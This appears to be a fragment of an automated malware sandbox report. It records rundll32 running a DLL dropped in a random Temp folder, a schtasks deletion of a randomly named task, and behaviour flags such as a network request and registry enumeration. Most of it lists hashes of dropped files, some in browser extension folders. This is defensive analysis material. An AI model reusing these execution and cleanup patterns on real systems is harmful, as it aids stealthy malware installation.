-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\NAmxXaxzgfEyPHjA\XTzKSsGd\oOyMGPr.dll",#1 /acsite_idzNK 3851181⤵PID:2568
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\NAmxXaxzgfEyPHjA\XTzKSsGd\oOyMGPr.dll",#1 /acsite_idzNK 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3532 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vIlXVaftrwFhqzMdS"3⤵PID:4760
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD57752348aeb44c067f1df36a56061e14d
SHA13d79a4337750f1530e7858f25ec264f1bf342788
SHA25672c7214f5335c615583affeaa71bd1a71ac612a8f0cf420d404d3ba393a5f1a9
SHA512ebb4ca593c4b54c0fdcf6136116830cea0d2239d7a32a3f4e9b12e02537dd31b99c96a47faea8645717b3f97b6c6edb68800bf511b4ddbd26d7da327a2088032
-
Filesize
2KB
MD5dd1aeeb05b28d4adaa9fb058f7d6a797
SHA1e483445b0e118f4386beae36f1d19d6a556cf22b
SHA256b4f36424e505efe2fee8c3387a5467a5c290d6edac1848a0dbae2505610e37cc
SHA5128aa7866f25d3dffed6cd9ebf54b43aef7f255e07aab405337dbef855fc3ffa1f5ed9e0e1f06780b52981b3f32c418b4ee63b1abeddc0e0cd547364b117ad54a8
-
Filesize
2KB
MD5ee2796e398d23228b3969661d1899cd5
SHA10bb938ce380d92b6b28ed36a04c78de707c52c4b
SHA2569e10d34a0d0ee212d28e3cec6ad94796fcd79ad629fc0832eeb5a05714d3e1f7
SHA512b8a791e236aaa2eecea25b155e6ec36661f76fa03ab381fb809e22c3d03b25045468cbab33cac85297051c179e2978ff097c42e9cbb92e0dfa7eb32fa64246ab
-
Filesize
2KB
MD5335ef2fa3f5cd3e7c9ce0d4623df8398
SHA1251905a485f610ce5de3bac0d8d3e231d85fc0a7
SHA2569c0b75eac29d141ceeea9ad31e0fe289895f587817529fd6e7eedec69ea3c89f
SHA512d8306597fa276d46cb50a270db3896571e130b462e868b6929914143a1e049bfca1ce1c2dd2c6b4dc5ed340b5c345661913ea20820891fc821ef10724640e6a8
-
Filesize
2.0MB
MD5503df6a99f3f35e27d6523ce7b391b8c
SHA1c62a24998814eb311d398e0e10d409e08e988c9c
SHA25678669ab5778873cffd0ec2b36e7db9bd8fd5194ab60f26ef8d6d4489a0062e8b
SHA512eec36272bb27bd0f203738c64154821deb66f56a19b2e678deecf4165425906e8b9ac8b51a65e6e819f3ce0f53cfdd3c4cb61f8d320657212ecc4036dbf67d34
-
Filesize
2KB
MD521b8cb6361fd14f2036c61dd8eb15b90
SHA1dc79cda2d426f752cc669a60c237f870fee9dc85
SHA2567a02d4af93b2eb09efbb73867600c374ddcbb7caa1e9d3022fa0ed73837fb2fc
SHA5122e4659a9b4b5b8fe04cd1d6a68923837cdaae1e6b6af63a03c6d380abf3aab5cbb8db8e6e5c3be5263e21049e345c242a96780e7e4d7fde25cab75f1e9748956
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5f12448983989bad77a769bba967f4d25
SHA1d3c8e09b4439eebf6e0439e8e67c792fef137221
SHA2560a85ead7007c892424e39f563ddb2ddb20aabdcdbce47140aebd9eae2f0eba05
SHA512262803f9639e337fd02fd92aa72665a4305fc6a4009d9a6023ec63b7d24d2e1bd0c2478e87fe67669d6429d3f91077d310595c17e4423321224770d2d2cf388f
-
Filesize
35KB
MD541c45d9d61451eaf180d97627a2bade9
SHA1afc507a2dda10626711724f782ddf7b9320f2063
SHA256b683f2987702283b2a054a73a9b32b0953a45f290fdfe58d1d52bd364302b1b4
SHA512c4e7d3c8dca86c74d6e80b01717bc4dadadc60c76eb0c393be65bc5d37849917d3080c0a31508d40fd922cbf2995eea7bc7e024b648209efea607f3ccca523b4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
11KB
MD51e999cc68ed5e8987fa1b4901d2456f8
SHA123b5453714768f0c66594f5765fb5524ad95aadc
SHA256a1f0fc9bc5b2f710af529b0461d3a268d1cd753a6c463961322085a4b0727f58
SHA51276c24aa50831d9baa7e4c2f9bce70d67ea83e759c75727e1ec6871e6d33bd8012025b3534331bf57b06333b81be7b73a36bf05b7cfd98da98562bc3ace7b6297
-
Filesize
6.7MB
MD52d7d0deff36ba2c924a9d81754b1467c
SHA17399691a8628d1d925b4eeb29df5770bb83a41ef
SHA25696536f2f80f2502ac7fe83f33c84bc36bc27fb0cd7b5d29e38e29db56eb5efe8
SHA512504bb9a0099e5a5fc4e858fad2c2aa2b8c83f37ce58c3a84069d535009eb85aa323213fbde1cc63773ab926c1a7ca50080ee2a15c5b25dd3dc7b8a9a662020af
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD55e974cef98d036cb32f9638587ea54db
SHA10b5fca92910307a8454a1378618627e3fbb90e63
SHA256b20f396c46c158357af8b93fcbb95d2844457c2b449889181e8fca4a9c1b2316
SHA512ee2af853c9d28d9b698ee11ae7395feb24246eb7407d088c9a64700f5d863c736d12f589c54dfaffbbd6a2f5009ecaffd5510041f84a60791f718bb26b8ff625
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD55b74da6778ccaa0e1ca4ae7484775943
SHA10a2f6f315a0ca1a0366b509aec7b13c606645654
SHA256172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78
SHA51220b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD54c8038b269e9e5aa8c90fec9bd9a5dc2
SHA135a0a1e66465967e4f97eddb57a617c15c44b377
SHA256575a253dde9d603efb7d563ca9a9e804a8c4101fb291d689f30ffab7d0611cf7
SHA512a8f1d6e38fe1726430b230b504969fda056d020a80e1379060210bdfe74b45700664b9547cea6c62012ac71b8cb2f89a73f85104f170144e43c7bb7b1c29fe5e
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5280a9709292bcc54ab23f3530b239e8f
SHA1d83f3f0c0f5b0d3b80b9b7280eb4069af1c75e53
SHA2563109719f4d789f0fe64bf4873adff4900be5cfbb87f705d74b505d511442dd2d
SHA5123d1384c3212cb4c0a85e487a1fda17bfcf4364a9ed2933669b3be2c2ad9abad93f1e573e0bcc33b5d6e7df2085f358d0cc9b50c25cc236bdf12d9455ac49df3b
-
Filesize
6.4MB
MD58474b8aedd9ce6b3e38b1b3bba18853e
SHA1c144caff9db9127fb7b3776d7f6958ed3551280c
SHA256e27d17b54f7824afdc203606535fc4871198f17a813b2a75a1521707ad706b40
SHA5120b2fcaa87757f34ff2b657b54488dba177e1bb3558d8770f3986e87bfe81200accc80cd1e944084fc74ac42a0ba582bc61d0600e6cf93cac11ca0bdfc275d30e
-
Filesize
6KB
MD579880aac9cbae98d4b93cfba2c9a0b0c
SHA195b78ab5a65ca633a65dd4aaaf8b68a79d444eb3
SHA25676edb884990b908886e62509829e8dbcc9523d0fcb87a8e9d57abf3f7680fb99
SHA51284925df0e40cc92185a01ce3b75da8999f29b743609cd76e8dc9378e3c40876ba3c2e344ceedcbb9f3c8adfc62abca57582b14265444f08030d8eb71af095b01